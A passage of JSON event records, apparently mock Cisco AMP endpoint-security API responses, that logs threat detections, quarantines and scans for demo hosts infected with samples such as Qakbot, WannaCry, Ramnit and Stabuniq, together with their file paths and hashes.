Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":1600,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826659179007312000,"timestamp":1610704800,"timestamp_nanoseconds":414000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Stabuniq.15nx.1201","detection_id":"5826659179007311873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Stabuniq","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"0a:87:63:dd:3c:53"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"stabuniq.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"},"parent":{"process_id":3276,"disposition":"Malicious","file_name":"stabuniq.exe","identity":{"sha256":"5a0d64cc41bb8455f38b4b31c6e69af9e7fd022b0ea9ea0c32c371def24d67fb","sha1":"17db1bbaa1bf1b920e47b28c3050cbff83ab16de","md5":"f31b797831b36a4877aa0fd173a7a4a2"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176254540350751000,"timestamp":1610704800,"timestamp_nanoseconds":844000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.4FE85509BB.Upatre.tht.VRT","detection_id":"6176254540350750721","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"drones832894238942.pdf.exe","file_path":"\\\\?\\C:\\drones832894238942.pdf.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159246968074797000,"timestamp":1610704800,"timestamp_nanoseconds":355000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159246968074797057","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3372C1EDAB46837F1E973164FA2D72","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\3372C1EDAB46837F1E973164FA2D72","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825663665717641000,"timestamp":1610704800,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ramnit.A","detection_id":"5825663665717641217","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Ramnit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"a1:ca:cb:a7:03:04"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Ramnit.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\Ramnit.exe","identity":{"sha256":"f52bfac9637aea189ec918d05113c36f5bcf580f3c0de8a934fe3438107d3f0c","sha1":"a7771cd3b99f7201b331323f03e2d596778b610e","md5":"607b2219fbcfbfe8e6ac9d7f3fb8d50e"},"parent":{"process_id":1604,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827054281638806000,"timestamp":1610704800,"timestamp_nanoseconds":664000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":1335,"scanned_processes":24,"scanned_paths":0,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832265790660805000,"timestamp":1610704800,"timestamp_nanoseconds":44000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825614900658962000,"timestamp":1610704800,"timestamp_nanoseconds":406000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5826707183856779000,"timestamp":1610704800,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Tinba","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"5a:ff:4a:a3:8a:2f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832363037310321000,"timestamp":1610704800,"timestamp_nanoseconds":969000000,"date":"2021-01-15T10:00:00+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_ZAccess","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e8:5d:f7:a4:c5:03"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":189474725,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 